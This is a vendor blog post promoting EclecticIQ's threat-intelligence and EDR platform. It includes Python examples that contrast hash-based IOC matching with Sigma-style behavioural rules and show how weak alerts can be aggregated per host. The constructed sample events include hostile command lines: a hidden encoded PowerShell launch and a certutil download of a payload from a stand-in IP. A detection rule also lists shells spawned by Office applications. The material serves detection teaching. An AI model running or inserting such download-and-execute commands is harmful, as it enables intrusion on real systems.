Despite success in managing and sharing threat intelligence for greater understanding, as an industry we have not yet solved the challenge of operationalizing this intelligence.
There are many reasons for this:
- Cyberthreats change rapidly
- The attack surface has expanded exponentially due to digitalization and cloud adoption
- Threat intelligence is often viewed as an add-on to security tools and practices
- Organizations face cyberthreats in isolation
- Existing tools do not let analyst teams scale up their activities or work more efficiently in detecting and responding to threats
To help organizations apply threat intelligence in their operations to defeat attackers and strengthen their overall security posture, EclecticIQ is launching a new platform that puts “Intelligence at the core™” of cyber defense. EclecticIQ Platform is designed to help customers run their cyberthreat intelligence and security operations more efficiently. This new platform builds on our pioneering, analyst-centric threat intelligence platform (TIP) that enables national governments, enterprises, and service providers to manage and collaborate on threat intelligence. It includes endpoint detection and response (EDR) capabilities and, later this year, will add extended detection and response (XDR) technology.
How to Operationalize Threat Intelligence
Go beyond IOCs/IOAs
Detecting cyberthreats requires more than static indicators of compromise (IOCs) and indicators of attack (IOAs), which point to an adversary’s infrastructure or previously observed malware: a recompiled binary or a freshly registered domain leaves the indicator behind while the behavior stays the same. Rapidly changing threats are therefore diminishing the value of IOCs and IOAs. Instead, threat intelligence solutions need to embrace dynamic, behavior-based detection built on attackers’ tactics, techniques, and procedures (TTPs). This means that behavior-based frameworks like MITRE ATT&CK, and threat detection and hunting content like EDR/SIEM rules and Sigma rules, need to become primary resources for acquiring, collaborating on, and applying threat intelligence.
In other words, staying ahead of the rapidly changing threat landscape requires an approach beyond the IOC. For instance, the new EDR solution included in EclecticIQ Platform is pre-bundled with hunting packs based on TTPs.
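As an added illustration (not code from this post or from EclecticIQ), the following Python runs both styles of detection over a few constructed Sysmon-like process-creation events: a hash IOC list, and a rule written in Sigma’s shape for an Office application spawning a shell (ATT&CK T1204.002). The hosts, hashes, command lines and the rule itself are made up, and the matcher implements only the subset of Sigma syntax the rule uses (field|endswith / field|contains modifiers, selections joined with `and`).

```python
"""Static IOC matching versus Sigma-style behavioural matching over
constructed process-creation events.

Added example for this article, not EclecticIQ code. Events, hashes and the
rule are constructed; the matcher supports only the small subset of Sigma
syntax used here.
"""

# Constructed hashes (placeholders, not real indicators).
H_KNOWN = "SHA256=" + "a1" * 32    # sample that was analysed and shared as an IOC
H_REBUILT = "SHA256=" + "b2" * 32  # same loader recompiled: the hash IOC no longer matches
H_BENIGN = "SHA256=" + "c3" * 32
H_OTHER = "SHA256=" + "d4" * 32

# Constructed telemetry in the shape of Sysmon Event ID 1 (process creation).
EVENTS = [
    {"host": "ws01",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
     "Hashes": H_KNOWN},
    {"host": "ws02",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
     "Hashes": H_REBUILT},
    {"host": "ws03",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service",
     "Hashes": H_BENIGN},
    {"host": "ws04",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c certutil -urlcache -f http://198.51.100.7/x.dat x.dat",
     "Hashes": H_OTHER},
]

# The IOC feed only knows the hash that was analysed.
KNOWN_BAD_HASHES = {H_KNOWN}

# Behavioural rule in Sigma's shape: an Office application spawning a shell.
SIGMA_RULE = {
    "title": "Office application spawning a command shell",
    "tags": ["attack.execution", "attack.t1204.002"],
    "detection": {
        "selection_parent": {
            "ParentImage|endswith": ["\\WINWORD.EXE", "\\EXCEL.EXE", "\\POWERPNT.EXE", "\\OUTLOOK.EXE"]},
        "selection_child": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe", "\\cmd.exe", "\\wscript.exe", "\\mshta.exe"]},
        "condition": "selection_parent and selection_child",
    },
}


def ioc_hits(events, bad_hashes):
    """Indices of events whose image hash is on the IOC list."""
    return [i for i, e in enumerate(events) if e.get("Hashes") in bad_hashes]


def _field_matches(event, key, wanted):
    """Evaluate one 'Field|modifier': values entry. Sigma string matching is
    case-insensitive, and a list of values is an OR."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    values = wanted if isinstance(wanted, list) else [wanted]
    for v in values:
        v = str(v).lower()
        if modifier == "endswith" and actual.endswith(v):
            return True
        if modifier == "startswith" and actual.startswith(v):
            return True
        if modifier == "contains" and v in actual:
            return True
        if modifier == "" and actual == v:
            return True
    return False


def _selection_matches(event, selection):
    # Every field inside one selection must match (AND).
    return all(_field_matches(event, k, v) for k, v in selection.items())


def sigma_hits(events, rule):
    """Indices of events matching the rule. Condition support is limited to
    selection names joined by 'and'."""
    det = rule["detection"]
    names = [n.strip() for n in det["condition"].split(" and ")]
    return [i for i, e in enumerate(events)
            if all(_selection_matches(e, det[n]) for n in names)]


if __name__ == "__main__":
    print("IOC hits:  ", [EVENTS[i]["host"] for i in ioc_hits(EVENTS, KNOWN_BAD_HASHES)])
    print("Sigma hits:", [EVENTS[i]["host"] for i in sigma_hits(EVENTS, SIGMA_RULE)])
```

The hash list catches only ws01, the sample that was already analysed. The behavioural rule also catches ws02 (same loader, recompiled) and ws04 (a different tool entirely, but the same technique), while leaving the administrator’s PowerShell session on ws03 alone. That gap between the two result sets is what the TTP-based hunting content is meant to close.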
Analyst time and attention is scarce. In pursuit of the perfect alert, our industry has become accustomed to down-selecting intelligence, alerts, and incidents based on the confidence that they indicate an active threat. In doing so, we’ve created an artificial threshold below which we’ve become blind.
Unfortunately, our confidence in the ability to detect notable and impactful threats isn’t always perfect – yet if we wait for perfect, we’ll always be too late. This challenge requires several solutions. First, analysts need the right tools to scale up their efforts, including powerful visualization, search, enrichment, and workflow automation, together with an all-encompassing view of the larger threat and risk landscape. Second, analysts should not operate in silos, facing the same threats in isolation. They should be able to obtain expert knowledge from peers and industry leaders and plug it into their tools. Collaboration on cyberthreats and incidents should be a given. Finally, they need ways of dealing with high volumes of low-confidence indications of threat, rather than ignoring them: a single weak signal may not be worth an analyst’s time, but several weak signals on the same host, spanning different stages of an attack, often are.
In other words, scalable analyst teams require the right tools, access to outside expertise, and a collaborative approach. EclecticIQ Platform allows analysts to collaborate internally and externally. Our new EDR solution comes with powerful search and visualization capabilities, while our upcoming XDR solution will take a new approach to hunting for large volumes of low-confidence data.
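One concrete way to stop discarding everything below the per-alert confidence bar is to accumulate weak signals per host and escalate on the combined evidence. The Python below is an added example for this article, not EclecticIQ code and not a description of any product’s algorithm: the hosts, signals and confidence values are constructed, and the combination rule (noisy-OR over the signals, plus a requirement that the evidence spans at least two ATT&CK tactics) is one simple, defensible choice among many.

```python
"""Per-host aggregation of low-confidence indications versus a per-alert
confidence threshold.

Added example for this article, not EclecticIQ code. Signals and confidence
values are constructed; the noisy-OR combination and the tactic-diversity
check are illustrative design choices, not a product algorithm.
"""
from collections import defaultdict
from math import prod

# Constructed signals: (host, ATT&CK tactic, detector confidence in 0..1).
# Confidence is read as "probability this reflects real adversary activity".
SIGNALS = [
    ("wsA", "execution", 0.90),           # one strong alert: escalates under either scheme
    ("wsB", "initial-access", 0.50),      # macro-enabled document opened from mail
    ("wsB", "execution", 0.40),           # unusual child process of an Office application
    ("wsB", "persistence", 0.35),         # new Run key pointing into a user-writable path
    ("wsB", "command-and-control", 0.30), # periodic DNS lookups for a recently registered domain
    ("wsC", "discovery", 0.50),           # the same noisy rule firing three times
    ("wsC", "discovery", 0.50),
    ("wsC", "discovery", 0.50),
]

PER_ALERT_THRESHOLD = 0.80


def per_alert_triage(signals, threshold=PER_ALERT_THRESHOLD):
    """The conventional approach: a host is worth looking at only if some
    single signal clears the bar. Everything below it is invisible."""
    return {host for host, _, conf in signals if conf >= threshold}


def combine(confidences):
    """Noisy-OR: probability that at least one of several independent
    indications is genuine, i.e. 1 - prod(1 - p_i)."""
    return 1.0 - prod(1.0 - c for c in confidences)


def aggregated_triage(signals, threshold=PER_ALERT_THRESHOLD, min_tactics=2):
    """Escalate a host when a single signal is strong, or when the combined
    evidence clears the bar AND spans at least `min_tactics` ATT&CK tactics.
    The diversity check stops one noisy rule from escalating a host just by
    firing repeatedly. A production version would also bound the signals by
    a time window; that is omitted here.
    Returns {host: (combined_score, tactics, escalate)}."""
    by_host = defaultdict(list)
    for host, tactic, conf in signals:
        by_host[host].append((tactic, conf))
    result = {}
    for host, items in by_host.items():
        score = combine(c for _, c in items)
        tactics = {t for t, _ in items}
        strong_single = any(c >= threshold for _, c in items)
        escalate = strong_single or (score >= threshold and len(tactics) >= min_tactics)
        result[host] = (round(score, 4), tactics, escalate)
    return result


def escalated(signals, **kwargs):
    """Hosts the aggregated scheme would hand to an analyst."""
    return {h for h, (_, _, esc) in aggregated_triage(signals, **kwargs).items() if esc}


if __name__ == "__main__":
    print("per-alert:", sorted(per_alert_triage(SIGNALS)))
    for host, (score, tactics, esc) in sorted(aggregated_triage(SIGNALS).items()):
        print(f"{host}: combined={score:.3f} tactics={len(tactics)} escalate={esc}")
```

With these constructed inputs the per-alert scheme surfaces only wsA. The aggregated scheme also surfaces wsB, whose four signals (none above 0.5) combine to roughly 0.86 across four tactics, while wsC stays below the line: its three identical discovery alerts also combine above the threshold, but they describe one technique firing repeatedly, which is exactly the noise the diversity requirement is there to filter.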
To effectively operationalize threat intelligence, organizations must adapt their cybersecurity defense at the same fast pace as the evolution of the threat landscape. At EclecticIQ, we’ve learned that a bolt-on approach to integrating threat intelligence limits the effectiveness of cyberthreat detection. For example, detecting an emerging threat that uses a novel technique calls for new means of collecting data on endpoints or cloud workloads. By designing detection systems with a foundation of threat intelligence, it’s possible to seamlessly adapt to emerging threats by temporarily expanding the types of data that are collected. Orchestrating intelligence to enhance the capabilities of security controls is only part of the solution. Ensuring your security stack can adapt its own mode of operation and configuration to match the changing threat landscape is key in staying ahead.
In other words, staying on track with emerging threats requires intelligence at the core of cyber defense. Our new EDR and XDR solutions are highly adaptable: they can be configured to collect the right data to cope with new and fast-changing threats.
Digitalization and cloud adoption are expanding the attack surface and the number of events to monitor, compounding the problem of ineffective use of threat intelligence to detect, hunt for, and effectively respond to cyberthreats. This large attack surface, combined with a myriad of tools including SOAR, EDR, and SIEM, is complicating security architectures to the point of becoming unmanageable. EclecticIQ aims to simplify management of and compatibility between critical security stack components with our integrated platform for threat intelligence, hunting, and response and our partnership with Devo for:
- High-performance, cloud-native logging
- Data ingestion from a variety of endpoint, network, and cyberthreat intelligence sources
- Automated IOC enrichment and machine learning-powered analytic capabilities
EclecticIQ Platform is unique in using threat intelligence as its foundation. This open and extensible platform makes it easy to use and share intelligence from multiple sources to detect threats earlier, remediate incidents faster, and run operations more efficiently.
If you believe what we believe about the critical importance of operationalizing – not just understanding – threat intelligence, join us on this journey to put intelligence at the core of your cyber defense operations.
I would love to hear from you. Contact me at firstname.lastname@example.org.